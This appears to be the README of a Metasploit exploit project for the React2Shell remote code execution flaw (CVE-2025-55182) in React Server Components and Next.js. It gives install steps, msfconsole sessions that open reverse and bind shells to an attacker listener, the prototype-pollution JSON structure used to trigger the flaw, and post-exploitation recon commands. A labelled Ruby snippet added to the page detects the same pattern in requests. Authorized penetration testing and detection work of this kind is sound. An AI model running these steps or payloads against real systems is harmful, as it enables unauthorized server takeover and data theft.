Fully compliant Metasploit modules for exploiting the React2Shell vulnerability (CVE-2025-55182) in React Server Components. Developed following strict Metasploit Framework auditor rules to ensure upstream compatibility.
- Scanner Module (auxiliary/scanner/http/react2shell.rb) - Non-destructive vulnerability detection
- Exploit Module (exploits/multi/http/react2shell_rce.rb) - Exploitation using native Metasploit payloads
- ✅ Native Framework: Uses exclusively Metasploit mixins and utilities
- ✅ Separation of Concerns: Scanner only detects, exploit only exploits
- ✅ Payload System: Uses payload.encoded from Metasploit's native system
- ✅ Error Handling: Robust handling with fail_with() and Failure::* codes
- ✅ Upstream Ready: Ready for contribution to Rapid7's official repository
- Metasploit Framework 6.0+
- Ruby 2.7+
- Testing Gems: rspec, rspec-quickcheck (for development)
# 1. Clone the repository
git clone https://github.com/MoisesTapia/react2shell-metasploit.git
cd react2shell-metasploit
# 2. Copy modules to Metasploit
sudo cp modules/auxiliary/scanner/http/react2shell.rb \
/usr/share/metasploit-framework/modules/auxiliary/scanner/http/
sudo cp modules/exploits/multi/http/react2shell_rce.rb \
/usr/share/metasploit-framework/modules/exploits/multi/http/
# 3. Reload Metasploit
msfconsole -q -x "reload_all"

# 1. Clone and setup
git clone https://github.com/MoisesTapia/react2shell-metasploit.git
cd react2shell-metasploit
# 2. Install dependencies
bundle install
# 3. Run tests
rspec spec/

msf6 > use auxiliary/scanner/http/react2shell
msf6 auxiliary(scanner/http/react2shell) > set RHOSTS 192.168.1.100
msf6 auxiliary(scanner/http/react2shell) > set TARGETURI /api/react
msf6 auxiliary(scanner/http/react2shell) > run

# Basic configuration
msf6 > use exploit/multi/http/react2shell_rce
msf6 exploit(multi/http/react2shell_rce) > set RHOSTS target.example.com
msf6 exploit(multi/http/react2shell_rce) > set TARGETURI /api/react
# Use native Metasploit payload
msf6 exploit(multi/http/react2shell_rce) > set payload cmd/unix/reverse_bash
msf6 exploit(multi/http/react2shell_rce) > set LHOST 192.168.1.50
msf6 exploit(multi/http/react2shell_rce) > set LPORT 4444
# Check vulnerability before exploiting
msf6 exploit(multi/http/react2shell_rce) > check
# Execute exploit
msf6 exploit(multi/http/react2shell_rce) > run

# Reverse shells
set payload cmd/unix/reverse_bash
set payload cmd/unix/reverse_netcat
set payload cmd/windows/reverse_powershell
# Bind shells
set payload cmd/unix/bind_netcat
set payload cmd/windows/bind_powershell
# Command execution
set payload cmd/unix/generic
set payload cmd/windows/generic

- RHOSTS: Target host(s) to scan
- RPORT: Service port (default: 80/443)
- SSL: Use SSL/TLS (auto-detected)
- TARGETURI: React Server Components endpoint (default: /)
- RHOSTS: Target host(s) to exploit
- RPORT: Service port (default: 80/443)
- SSL: Use SSL/TLS (auto-detected)
- TARGETURI: Vulnerable endpoint (default: /)
- Payload Options: Specific configuration for selected payload
┌─────────────────────────────────────────────────────────────┐
│                    Metasploit Framework                     │
├─────────────────────────────────────────────────────────────┤
│ ┌─────────────────────────┐ ┌─────────────────────────────┐ │
│ │ Scanner Module          │ │ Exploit Module              │ │
│ │ (auxiliary/scanner)     │ │ (exploit/remote)            │ │
│ │                         │ │                             │ │
│ │ - Msf::Auxiliary        │ │ - Msf::Exploit::Remote      │ │
│ │ - Msf::Auxiliary::      │ │ - Msf::Exploit::Remote::    │ │
│ │   Scanner               │ │   HttpClient                │ │
│ │ - Msf::Exploit::Remote::│ │                             │ │
│ │   HttpClient            │ │ - Uses payload.encoded      │ │
│ │                         │ │ - ARCH_CMD compatible       │ │
│ │ - Non-destructive only  │ │ - Native Metasploit         │ │
│ │ - CheckCode reporting   │ │   payloads only             │ │
│ │ - report_vuln()         │ │                             │ │
│ └─────────────────────────┘ └─────────────────────────────┘ │
└─────────────────────────────────────────────────────────────┘
- Non-Destructive Detection: Only sends test payloads that don't execute commands
- CheckCode Compliance: Returns standard codes (Vulnerable, Appears, Safe, Unknown)
- Standard Reporting: Uses report_vuln() with all required parameters
- Native HTTP: Uses exclusively send_request_cgi() and normalize_uri()

- Native Payload System: Uses only payload.encoded from Metasploit
- ARCH_CMD Support: Compatible with all Metasploit command payloads
- Robust Error Handling: Uses fail_with() with appropriate Failure::* codes
- Check Method: Reuses scanner logic for pre-exploitation verification
Vulnerability in React Server Components (RSC) that allows remote code execution through unsafe deserialization of the Flight Protocol.
Affected Versions:
- Next.js 14.3.x-canary
- Next.js 15.x
- Next.js 16.x
- React Server Components with Flight Protocol
Exploitation Technique:
- Prototype Pollution: Abuse of _prefix field in RSC chunks
- Function Constructor: Transform _formData.get into Function() constructor
- Code Execution: Execute arbitrary JavaScript on the server
- Payload Integration: Use Metasploit's native payload system
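A defender-side check for the technique listed above, added here as an example and not part of this project's modules: it walks one JSON chunk from a request body and flags reference strings whose path passes through __proto__, prototype or constructor. The $<id>:<path> reference shape is taken from the structure shown on this page; the function names, the segment list and both sample bodies are constructed for illustration, and extracting chunks from the multipart request is assumed to happen elsewhere.

```ruby
require 'json'

# Assumption: path segments treated as suspicious (prototype chain / Function constructor).
DANGEROUS_SEGMENTS = %w[__proto__ prototype constructor].freeze
# Reference shape as seen on this page: "$<id>:<segment>:<segment>..."
REFERENCE = /\A\$\w*(?::[^:]+)+\z/

# Walk a parsed JSON value; collect [json_path, reference] for each flagged string.
def suspicious_refs(node, path = '$root', hits = [])
  case node
  when Hash
    node.each { |key, val| suspicious_refs(val, "#{path}.#{key}", hits) }
  when Array
    node.each_with_index { |val, i| suspicious_refs(val, "#{path}[#{i}]", hits) }
  when String
    if node.match?(REFERENCE) && (node.split(':').drop(1) & DANGEROUS_SEGMENTS).any?
      hits << [path, node]
    elsif node.start_with?('{', '[')
      # A chunk can carry JSON inside a string (the "value" field); inspect that too.
      nested = begin
        JSON.parse(node)
      rescue JSON::ParserError
        nil
      end
      suspicious_refs(nested, "#{path}<json>", hits) if nested
    end
  end
  hits
end

# Scan one raw chunk body; bodies that are not JSON produce no findings.
def scan_body(raw)
  suspicious_refs(JSON.parse(raw))
rescue JSON::ParserError
  []
end

# Constructed samples: the page's structure with its inert placeholder, and a benign body.
SAMPLE_FLAGGED = <<~'BODY'
  {"then":"$1:__proto__:then","status":"resolved_model","reason":-1,
   "value":"{\"then\":\"$B0\"}",
   "_response":{"_prefix":"PAYLOAD_HERE","_formData":{"get":"$1:constructor:constructor"}}}
BODY
SAMPLE_BENIGN = '{"id":"$1:items:0","title":"constructor notes","ref":"$B0"}'

scan_body(SAMPLE_FLAGGED).each { |path, ref| puts "flagged #{path}: #{ref}" }
puts "benign findings: #{scan_body(SAMPLE_BENIGN).size}"
```

A match is a reason to inspect the request, not proof of exploitation; patching to a fixed release remains the actual remediation.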
{
"then": "$1:__proto__:then",
"status": "resolved_model",
"reason": -1,
"value": "{\"then\":\"$B0\"}",
"_response": {
"_prefix": "PAYLOAD_HERE",
"_formData": {
"get": "$1:constructor:constructor"
}
}
}

- Verify connectivity to target
- Confirm TARGETURI points to correct endpoint
- Review logs with set VERBOSE true
- Verify target uses React Server Components
- Confirm vulnerable Next.js/React version
- Try different endpoints with TARGETURI
[*] Exploit failed [bad-config]: No payload available
- Select compatible payload: set payload cmd/unix/reverse_bash
- Configure payload options: set LHOST, set LPORT
[*] Exploit failed [unreachable]: Connection failed
- Verify network connectivity
- Confirm port is open
- Review proxy/SSL configuration
[*] Exploit failed [unexpected-reply]: Server responded with code 404
- Verify correct TARGETURI
- Confirm endpoint is vulnerable
- Run check before exploit
# Enable detailed output
set VERBOSE true
# Show all options
show options
# Show available payloads
show payloads

# Unit tests
rspec spec/ --format documentation
# Compliance tests
rspec spec/ --tag compliance
# Integration tests
rspec spec/ --tag integration

# Setup environment
bundle install --path vendor/bundle
# Code linting
rubocop modules/ spec/
# Security analysis
semgrep --config=.semgrep.yml modules/
# Code smell detection
reek modules/

react2shell-metasploit/
├── modules/
│   ├── auxiliary/scanner/http/
│   │   └── react2shell.rb       # Scanner module
│   └── exploits/multi/http/
│       └── react2shell_rce.rb   # Exploit module
├── spec/                        # Tests
├── .github/                     # CI/CD workflows
├── .rubocop.yml                 # Linting config
├── .semgrep.yml                 # Security scanning
├── .reek.yml                    # Code smell detection
├── Gemfile                      # Dependencies
└── README.md                    # This documentation
- Only use on owned systems or with explicit written authorization
- Follow responsible disclosure practices for discovered vulnerabilities
- Comply with local laws and cybersecurity regulations
- Document and report usage in security audits
- Use in laboratory environments for testing
- Monitor target logs for detection indicators
- Clean up artifacts after successful exploitation
- Maintain confidentiality of obtained data
# Basic system information
msf6 exploit(multi/http/react2shell_rce) > set payload cmd/unix/generic
msf6 exploit(multi/http/react2shell_rce) > set CMD "uname -a && whoami && id"
msf6 exploit(multi/http/react2shell_rce) > run
# Running processes
msf6 exploit(multi/http/react2shell_rce) > set CMD "ps aux | head -20"
msf6 exploit(multi/http/react2shell_rce) > run
# Network connections
msf6 exploit(multi/http/react2shell_rce) > set CMD "netstat -tulpn"
msf6 exploit(multi/http/react2shell_rce) > run

# Setup listener
msf6 > use multi/handler
msf6 exploit(multi/handler) > set payload cmd/unix/reverse_bash
msf6 exploit(multi/handler) > set LHOST 192.168.1.50
msf6 exploit(multi/handler) > set LPORT 4444
msf6 exploit(multi/handler) > run -j
# Execute exploit in another session
msf6 > use exploit/multi/http/react2shell_rce
msf6 exploit(multi/http/react2shell_rce) > set RHOSTS target.example.com
msf6 exploit(multi/http/react2shell_rce) > set payload cmd/unix/reverse_bash
msf6 exploit(multi/http/react2shell_rce) > set LHOST 192.168.1.50
msf6 exploit(multi/http/react2shell_rce) > set LPORT 4444
msf6 exploit(multi/http/react2shell_rce) > run

This project strictly follows Metasploit Framework Guidelines:
- No Custom Frameworks: Only native Metasploit components
- Separation of Concerns: Scanner detects, exploit exploits
- Native Payload System: Exclusive use of payload.encoded
- Standard Error Handling: fail_with() with appropriate codes
- Proper Reporting: Standard report_vuln() and store_loot()

- Extend only approved Metasploit base classes
- Use native mixins (Scanner, HttpClient, etc.)
- Implement required methods (run_host, check, exploit)
- Use send_request_cgi() for HTTP operations
- Handle errors with specific Rex exceptions
- Report vulnerabilities with standard parameters
- Test with multiple Metasploit payloads
- Document compliance decisions
- Fork the repository
- Create feature branch: git checkout -b feature/new-functionality
- Follow Metasploit compliance rules
- Add tests for new functionality
- Commit changes: git commit -am 'Add new functionality'
- Push to branch: git push origin feature/new-functionality
- Create Pull Request with detailed description
- Metasploit Framework Documentation
- Rapid7 Module Guidelines
- React Server Components
- Next.js Security
- RuboCop - Ruby linting
- Reek - Code smell detection
- Semgrep - Static security analysis
- RSpec - Testing framework
This project is licensed under the Metasploit Framework License (MSF_LICENSE).
This software is provided "as is" without warranties of any kind. The authors are not responsible for misuse of this tool. Using this software to attack systems without explicit authorization is illegal and strictly prohibited.
- ✅ Authorized security audits
- ✅ Ethical security research
- ✅ Laboratory and testing environments
- ❌ Unauthorized attacks
- ❌ Malicious activities
- ❌ Terms of service violations
Developed by: Moises Tapia (Cl0wnr3v)
Specialization: Cloud Security Architect, Cloud Penetration Tester & Red Teamer
Version: 1.0.0
Last updated: January 2025
Project Status: ✅ Metasploit Framework Compliant | ✅ Ready for Upstream Submission